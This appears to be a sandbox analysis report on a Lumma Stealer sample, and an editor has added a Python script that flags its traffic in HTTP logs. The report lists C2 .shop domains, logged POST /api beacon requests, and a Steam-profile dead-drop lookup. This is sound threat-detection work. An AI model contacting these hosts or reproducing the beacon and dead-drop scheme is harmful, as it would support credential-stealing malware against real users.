    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58449 -> 172.67.189.2:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58441 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58447 -> 104.21.77.130:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58447 -> 104.21.77.130:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58440 -> 104.21.4.136:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58443 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58442 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58444 -> 104.21.58.182:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58445 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:58446 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:58446 -> 188.114.96.3:443
    Source: Malware configuration extractor | URLs: reinforcenh.shop
    Source: Malware configuration extractor | URLs: offensivedzvju.shop
    Source: Malware configuration extractor | URLs: fragnantbui.shop
    Source: Malware configuration extractor | URLs: lootebarrkeyn.shop
    Source: Malware configuration extractor | URLs: stogeneratmns.shop
    Source: Malware configuration extractor | URLs: ghostreedmnu.shop
    Source: Malware configuration extractor | URLs: drawzhotdog.shop
    Source: Malware configuration extractor | URLs: vozmeatillu.shop
    Source: Malware configuration extractor | URLs: gutterydhowi.shop
    Source: Joe Sandbox View | IP Address: 104.21.77.130
    Source: Joe Sandbox View | IP Address: 104.21.4.136
    Source: Joe Sandbox View | IP Address: 172.67.189.2
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: gutterydhowi.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: ghostreedmnu.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: offensivedzvju.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: vozmeatillu.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: drawzhotdog.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: fragnantbui.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: stogeneratmns.shop
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: reinforcenh.shop
    Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: performenj.shop
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
    Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: LRPC-e9c77b0923665da6f1.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global traffic | DNS traffic detected: DNS query: lootebarrkeyn.shop
    Source: global traffic | DNS traffic detected: DNS query: gutterydhowi.shop
    Source: global traffic | DNS traffic detected: DNS query: ghostreedmnu.shop
    Source: global traffic | DNS traffic detected: DNS query: offensivedzvju.shop
    Source: global traffic | DNS traffic detected: DNS query: vozmeatillu.shop
    Source: global traffic | DNS traffic detected: DNS query: drawzhotdog.shop
    Source: global traffic | DNS traffic detected: DNS query: fragnantbui.shop
    Source: global traffic | DNS traffic detected: DNS query: stogeneratmns.shop
    Source: global traffic | DNS traffic detected: DNS query: reinforcenh.shop
    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: performenj.shop
    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: gutterydhowi.shop
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drawzhotdog.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fragnantbui.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gutterydhowi.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://offensivedzvju.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://performenj.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://performenj.shop/G
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://performenj.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://performenj.shop/apiG
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://performenj.shop/vo
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reinforcenh.shop/
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reinforcenh.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reinforcenh.shop/api2
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001276000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/K
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/x
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stogeneratmns.shop/api
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stogeneratmns.shop/apiD
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
    Source: RegAsm.exe, 00000002.00000002.1795323805.000000000130E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vozmeatillu.shop/Y
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
    Source: RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
    Source: unknown | Network traffic detected: HTTP traffic on port 58443 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 58440 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58447
    Source: unknown | Network traffic detected: HTTP traffic on port 58445 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 58446 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58446
    Source: unknown | Network traffic detected: HTTP traffic on port 58441 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 58444 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58449
    Source: unknown | Network traffic detected: HTTP traffic on port 58442 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58448
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58443
    Source: unknown | Network traffic detected: HTTP traffic on port 58448 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58442
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58445
    Source: unknown | Network traffic detected: HTTP traffic on port 58447 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58444
    Source: unknown | Network traffic detected: HTTP traffic on port 58449 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58441
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 58440
    Source: unknown | HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:58440 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58441 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58442 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58443 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.58.182:443 -> 192.168.2.4:58444 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:58445 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:58446 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.4:58447 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:58448 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.189.2:443 -> 192.168.2.4:58449 version: TLS 1.2
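The network rows above (the Suricata Lumma alerts, the nine configuration domains, the identical POST /api check-ins with an 8-byte form body and a fixed Chrome/119 User-Agent, and the steamcommunity.com profile fetch) describe a beacon shape a defender can match in decrypted proxy or sandbox HTTP logs. What follows is an added example written for this page, not code from Joe Sandbox or from the sample: it parses raw HTTP request heads and scores them against those traits. The request text is constructed from the request lines listed in this report; the record layout and function names are the example's own. One inference is the editor's rather than the report's: Lumma is documented to use a Steam profile page as a dead-drop resolver for a C2 domain, and this run fits that pattern (performenj.shop is absent from the extracted configuration and is resolved only after steamcommunity.com), but the report itself does not decode the profile.

```python
# Added example: triage of HTTP request heads against the Lumma C2 traits
# listed in this report. Editor-written illustration, not Joe Sandbox code.
# SAMPLE_REQUESTS is constructed from the request lines in the report; the
# record layout and function names are this example's own.
from dataclasses import dataclass, field

# Domains from the "Malware configuration extractor" rows of this report.
CONFIG_C2_DOMAINS = frozenset({
    "reinforcenh.shop", "offensivedzvju.shop", "fragnantbui.shop",
    "lootebarrkeyn.shop", "stogeneratmns.shop", "ghostreedmnu.shop",
    "drawzhotdog.shop", "vozmeatillu.shop", "gutterydhowi.shop",
})
# The fixed User-Agent the sample sends on every request in this report.
STEALER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    def header(self, name, default=""):
        return self.headers.get(name.lower(), default)


def parse_request(raw):
    """Parse an HTTP/1.x request head (request line plus headers)."""
    lines = raw.strip("\r\n").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line ends the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def classify(req):
    """Return the reasons a request matches Lumma C2 traits ([] = no match)."""
    host = req.header("Host")
    reasons = []
    if host in CONFIG_C2_DOMAINS:
        reasons.append("host is in the extracted C2 configuration")
    checkin_shape = (req.method == "POST" and req.path == "/api"
                     and req.header("Content-Type") == "application/x-www-form-urlencoded"
                     and req.header("Content-Length") == "8")
    if checkin_shape:
        reasons.append("POST /api with an 8-byte form body (check-in shape)")
        if host not in CONFIG_C2_DOMAINS:
            reasons.append("check-in host absent from config (possible dead-drop result)")
    if (req.method == "GET" and host == "steamcommunity.com"
            and req.path.startswith("/profiles/")
            and req.header("User-Agent") == STEALER_UA):
        reasons.append("Steam profile fetch with the stealer's fixed UA (dead-drop lookup)")
    return reasons


def triage(raw_requests):
    """Map Host -> reasons for every request that matched at least one rule."""
    hits = {}
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = classify(req)
        if reasons:
            hits[req.header("Host")] = reasons
    return hits


# Constructed sample traffic, rebuilt from the request lines in this report.
CHECKIN = ("POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n"
           f"User-Agent: {STEALER_UA}\r\nContent-Length: 8\r\nHost: {{host}}\r\n\r\n")
SAMPLE_REQUESTS = [
    CHECKIN.format(host="gutterydhowi.shop"),
    ("GET /profiles/76561199724331900 HTTP/1.1\r\nConnection: Keep-Alive\r\n"
     f"User-Agent: {STEALER_UA}\r\nHost: steamcommunity.com\r\n\r\n"),
    CHECKIN.format(host="performenj.shop"),
    # Benign control: an ordinary page load from a real Chrome 119 browser.
    f"GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: {STEALER_UA}\r\n\r\n",
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_REQUESTS).items():
        print(host, "->", "; ".join(reasons))
```

On the wire these check-ins are TLS 1.2 sessions to Cloudflare-fronted addresses, so the 8-byte POST /api shape is only visible behind TLS inspection or in a sandbox. Without that, hunt on DNS and SNI for the listed domains and on the JA3 value the report gives, and treat the User-Agent on its own as weak evidence: it is a genuine Chrome 119 string, which is why the benign control above produces no hit.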
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00439000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard

    System Summary

    Source: a7HdB2dU5P.exe, MoveAngles.cs | Large array initialization: MoveAngles: array initializer size 364544
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00410480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00447600
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040FEBC
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0044004B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00401000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0044B020
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004450E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004340F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004091F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004012A7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042A345
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0044B300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040A3C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042C390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00449390
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00407470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040B470
